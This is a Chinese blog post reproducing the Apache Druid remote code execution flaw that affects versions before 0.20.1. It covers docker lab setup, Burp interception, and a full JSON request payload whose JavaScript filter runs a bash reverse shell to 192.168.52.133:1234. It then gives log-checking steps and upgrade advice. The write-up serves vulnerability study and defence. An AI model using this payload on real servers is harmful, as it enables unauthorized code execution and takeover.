大柚子

这世界不过如此

概述

Druid 是一个分布式的、支持实时多维 OLAP 分析的数据处理系统。它既支持高速的数据实时摄入处理,也支持实时且灵活的多维数据分析查询。因此 Druid 最常用的场景就是大数据背景下、灵活快速的多维 OLAP 分析。 另外,Druid 还有一个关键的特点:它支持根据时间戳对数据进行预聚合摄入和聚合分析,因此也有用户经常在有时序数据处理分析的场景中用到它。

在Druid 0.20.0及更低版本中,用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。攻击者可直接构造恶意请求执行任意代码,控制服务器。

影响版本

Apache Druid < 0.20.1

漏洞复现

环境搭建

在虚拟机安装docker,安装完成后使用以下命令pull漏洞环境

docker pull fokkodriesprong/docker-druid

下载漏洞环境后使用以下命令启动漏洞环境

docker run --rm -i -p 8888:8888 fokkodriesprong/docker-druid

启动后在浏览器访问http://your-ip:8888/看到以下界面表示成功

漏洞复现

在浏览器进入Apache Druid首页如何点击点击左上方Load data -> Local disk按钮

右侧表单填入Base directory:quickstart/tutorial/
File filter:wikiticker-2015-09-12-sampled.json.gz
填入完成点击Preview,然后点击next

打开burp进行抓包,然后一直点击next,直到下一步是Next:Filter时,抓取数据包

然后替换数据包中的data数据为以下代码,然后修改代码中的exec()方法里的命令,这里为反弹shell指令

{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript",

"function":"function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.52.133/1234 0>&1')}",

"dimension":"added",

"":{

"enabled":"true"

}

}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000,"cacheKey":"4ddb48fdbad7406084e37a1b80100214"}}

应急排查

1、docker logs排查

本环境为docker环境,日志未记录访问日志

2、druid自身调试日志

druid默认的log4j.xml路径为:conf/druid/cluster/_common/log4j2.xml

日志配置可参考:https://cangchen.blog.csdn.net/article/details/117065802?spm=1001.2101.3001.6661.1&utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1.pc_relevant_default&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1.pc_relevant_default&utm_relevant_index=1

一一查看这些日志文件,未发现有访问路径的入侵痕迹

3、排查需web访问日志,搜索关键字”/druid/indexer/v1/samler?for=filter”

加固建议

1、升级到最新版Apache Druid,下载地址为

https://druid.apache.org/downloads.html

Print Friendly, PDF & Email

发表回复

您的电子邮箱地址不会被公开。